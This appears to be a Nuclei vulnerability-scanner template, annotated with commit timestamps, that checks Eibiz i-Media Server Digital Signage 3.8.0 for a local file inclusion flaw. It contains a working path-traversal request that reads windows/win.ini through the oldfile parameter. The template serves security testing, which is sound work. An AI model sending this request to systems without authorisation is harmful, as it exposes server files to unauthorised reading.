2021-11-18 16:22:30 +00:00
id : eibiz-lfi
2021-11-18 11:21:20 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion
2021-11-18 11:21:20 +00:00
author : 0x_akoko
severity : high
2022-07-26 13:45:11 +00:00
description : Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
2022-07-26 13:45:11 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : lfi,eibiz,packetstorm,windows
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-11-18 11:21:20 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-18 11:21:20 +00:00
- method : GET
path :
- "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
matchers :
- type : word
2021-11-18 16:22:30 +00:00
part : body
2021-11-18 11:21:20 +00:00
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and